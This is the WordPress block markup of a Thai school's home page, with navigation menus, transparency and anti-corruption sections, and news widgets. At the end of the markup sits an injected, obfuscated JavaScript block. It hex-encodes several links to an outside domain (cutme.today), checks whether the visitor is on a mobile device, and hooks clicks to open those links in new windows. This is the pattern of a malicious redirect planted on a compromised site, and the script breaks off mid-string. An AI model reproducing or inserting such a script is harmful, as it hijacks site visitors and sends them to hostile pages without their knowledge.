",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreBgColor\":\"#0a71ad\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250},\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6